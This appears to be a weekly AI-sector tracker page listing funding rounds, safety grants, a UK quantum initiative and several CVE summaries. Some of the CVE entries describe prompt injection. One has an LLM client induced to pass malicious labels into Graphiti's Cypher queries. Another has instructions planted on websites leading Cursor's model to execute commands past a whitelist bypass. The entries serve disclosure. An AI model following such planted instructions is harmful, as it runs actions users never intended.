AI Signals Archive
All signals tracked by Mappera. Updated weekly.
Published by: Department for Science, Innovation and Technology, HM Treasury. UK unveils new package of measures to become the first country in the world to roll out Quantum computers at scale.
CVE-2026-32247 (CVSS 8.1 — HIGH). Graphiti is a framework for building and querying temporal context graphs for AI agents. Graphiti versions before 0.28.2 contained a Cypher injection vulnerability in shared search-filter construction for non-Kuzu backends. Attacker-controlled label values supplied through SearchFilters.node_labels were concatenated directly into Cypher label expressions without validation. In MCP deployments, this was exploitable not only through direct untrusted access to the Graphiti MCP server, but also through prompt injection against an LLM client that could be induced t
CVE-2026-27940 (CVSS 7.8 — HIGH). llama.cpp is an inference of several LLM models in C/C++. Prior to b8146, the gguf_init_from_file_impl() in gguf.cpp is vulnerable to an Integer overflow, leading to an undersized heap allocation. Using the subsequent fread() writes 528+ bytes of attacker-controlled data past the buffer boundary. This is a bypass of a similar bug in the same file - CVE-2025-53630, but the fix overlooked some areas. This vulnerability is fixed in b8146.
CVE-2026-31854 (CVSS 8.7 — HIGH). Cursor is a code editor built for programming with AI. Prior to 2.0 ,if a visited website contains maliciously crafted instructions, the model may attempt to follow them in order to “assist” the user. When combined with a bypass of the command whitelist mechanism, such indirect prompt injections could result in commands being executed automatically, without the user’s explicit intent, thereby posing a significant security risk. This vulnerability is fixed in 2.0.
CVE-2026-30741 (CVSS 9.8 — CRITICAL). A remote code execution (RCE) vulnerability in OpenClaw Agent Platform v2026.2.6 allows attackers to execute arbitrary code via a Request-Side prompt injection attack.
Request for proposals across 21 research areas in technical AI safety. Largest single-round safety RFP to date.
UK AI Safety Institute awards grants for systemic AI risk research and safety evaluation challenges.
Enterprise interpretability platform backed by Lightspeed Venture Partners.
DARPA COOPERATIVE AGREEMENT (B) to REGENTS OF THE UNIVERSITY OF CALIFORNIA, THE. SPECIAL YEAR ON LARGE LANGUAGE MODELS AND TRANSFORMERS
Survival and Flourishing Fund allocates $29M of $34.3M total to AI safety organisations in its largest round.
Intelligent model routing using representation analysis. Backed by NEA, Sequoia, a16z.
Pure safety research lab raises $1B at $5B valuation. Backed by a16z, Sequoia, DST Global, and others.
Enterprise networking giant acquires AI security startup, signalling maturation of robustness/security into mainstream enterprise procurement.